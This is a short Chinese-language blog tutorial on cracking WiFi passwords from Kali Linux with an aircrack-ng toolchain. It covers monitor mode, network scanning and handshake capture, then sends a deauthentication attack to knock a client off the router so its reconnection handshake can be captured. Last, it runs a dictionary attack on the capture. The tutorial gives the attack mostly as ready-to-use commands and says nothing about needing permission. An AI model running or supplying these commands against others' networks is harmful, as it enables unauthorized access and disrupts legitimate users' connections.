
说明
-
虚拟机装的是Kali官网下载的VM的1902Kali镜像包,用Xshell连接操作
-
USB无线网卡使用的是某东上搜索
CDLinux
找到的免驱Ralink 802.11n
-
airmon-ng有个局限:
必须扫描到路由器MAC地址和它的连接设备的MAC地址才可以破解,即若只有路由器MAC地址,却没有连接的设备,那就是不行的.
开始
- 接入无线网卡

1.快速运行
网卡分类 | 快速运行命令 |
---|---|
RTL8812au芯片网卡推荐
|
ifconfig wlan0 up airmon-ng check kill airodump-ng wlan0
|
一般网卡 |
ifconfig wlan0 up airmon-ng check kill airmon-ng start wlan0 airodump-ng wlan0mon
|
2. 完整运行
- 查看网卡信息
airmon-ng

或
iwconfig

或
ifconfig -a

-
激活网卡
ifconfig wlan0 up
-
关掉干扰进程
airmon-ng check kill
-
刷新下网卡驱动缓存(可选)
rfkill block wifi
rfkill unblock wifi
-
开启监听模式
airmon-ng start wlan0

- 验证监听模式开启
iwconfig

或
airmon-ng

- 扫描WiFi
airodump-ng wlan0mon

- 针对要破解的WiFi重新开启监听记录,发送断开命令,等待客户端重新连接时监听密码包
格式:airodump-ng -w [文件名](用来保存监听到的数据) -c [监听频道] wlan0mon
airodump-ng -w 51pwd -c 1 wlan0mon
- 打开另一个shell窗口运行(强制断开连接到路由器的设备,以便在它再次连接时捕获它的认证包)
格式:aireplay-ng -0 1 -a [路由器的MAC地址] -c [客户端的MAC地址] wlan0mon
- 跑包测试加密的无线密码
格式:aircrack-ng -w [准备好的密码字典] [捕获到的数据包]
参阅:
更新中......
网友评论